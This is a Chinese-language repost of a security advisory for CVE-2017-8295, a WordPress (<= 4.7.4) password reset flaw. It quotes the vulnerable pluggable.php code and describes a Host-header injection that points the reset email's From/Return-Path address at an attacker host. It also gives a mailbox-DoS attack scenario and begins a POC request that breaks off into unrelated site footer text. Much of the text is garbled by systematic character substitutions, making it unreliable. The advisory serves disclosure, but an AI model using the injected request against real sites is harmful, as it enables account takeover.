正如我们所看到的,Wordpress为了生成重置邮件创建的一个From/Return-Path(发件人/收件人)头,应用SERVER_NAME变量以获取办事器的主机名。
- 马脚提交者:Dawid Golunski
- 马脚编号:CVE-2017-8295
- 宣布日期:2017-05-03
- 修订版本:1.0
- 马脚伤害:中/高

一、马脚
WordPress内核<= 4.7.4存在未经授权的暗码重置(0day)
WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容治理体系。截止2017年2月,Alexa排名前1000万的┞肪点中约有27.5%应用该治理体系。捷报道有跨越6000万站点应用WordPress进行站点治理或者作为博客体系。
二、背景
三、介绍
WordPress的重置暗码功能存在马脚,在某些情况下不须要应用之前的身份令牌验证获取暗码重置链接。
四、描述
该马脚源竽暌冠WordPress默认应用弗成信的数据。当生成一个暗码重置邮件时应当是仅发送授与帐户相接洽关系的电子邮件。
大年夜下面的代码片段可以看出,在调用PHP mail()函数前创建了一个From email头
- ------[ wp-includes/pluggable.php ]------
- ...
- if ( !isset( $from_email ) ) {
- // Get the site domain and get rid of www.
- $sitename = strtolower( $_SERVER['SERVER_NAME'] );
- if ( substr( $sitename, 0, 4 ) == 'www.' ) {
- $sitename = substr( $sitename, 4 );
- }
- $from_email = 'wordpress@' . $sitename;
- }
- ...
- -----------------------------------------
然而,诸如Apache的主流web办事器默认应用由客户端供给的主机名来设置SERVER_NAME变量(参考Apache文档)
因为SERVER_NAME可以进行修改,进击者可以随便率性设置该值,例如attackers-mxserver.com
这将导致Wordpress的$from_email变为wordpress@attackers-mxserver.com,最终导致包含From/Return-Path(发件人/收件人)设置的暗码重置邮件发送到了该恶意邮件地址。
至于进击者可以修改哪那一封电子邮件的头信息,这取决于办事器情况(参考PHP文档)
基于邮件办事器的设备,可能导致被修悛改邮件头的恶意收件人/发件人地址的电子邮件发送给WordPress用户。
这使得进击者可以或许在不须要进行交互就可以朝长进步本该是须要进行交互才能进行的操作的暗码重置邮件。
进击场景:
如不雅进击者知道用户的电子邮件地址。为了让暗码重置邮件被办事器拒收,或者无法达到目标地址。他们可以先对用户的电子邮件帐户进行DoS进击(经由过程发送多个跨越用户磁盘配额的大年夜文件邮件或进击该DNS办事器)
某些主动答复可能会附加有邮件发送副本
发送多封暗码重置邮件给用户,迫应用户对这些没完没了的暗码重置邮件进行答复,答复中就包含的暗码链接会发送给进击者。
五、POC
如不雅进击者将类似下面的请求发送到默承认经由过程IP地址拜访的Wordpress安装页面(IP-based vhost):
- #!/bin/bash
- cat > /tmp/outgoing-email
- -----[ HTTP Request ]----
- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
- Host: injected-attackers-mxserver.com
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 56
推荐阅读
【51CTO.com原创稿件】人工智能风口正盛 ,巨擘们纷纷构造各有倚重,个一一些巨擘早有预备。大年夜约两年前,当微软CEO萨提亚 ∙ 纳德拉第一次提出“构建微软智能云”的远>>>详细阅读
本文标题:WordPress曝未经授权的密码重置漏洞(CVE-2017-8295 )
地址:http://www.17bianji.com/lsqh/35043.html
1/2 1

网友点评
精彩导读
科技快报
品牌展示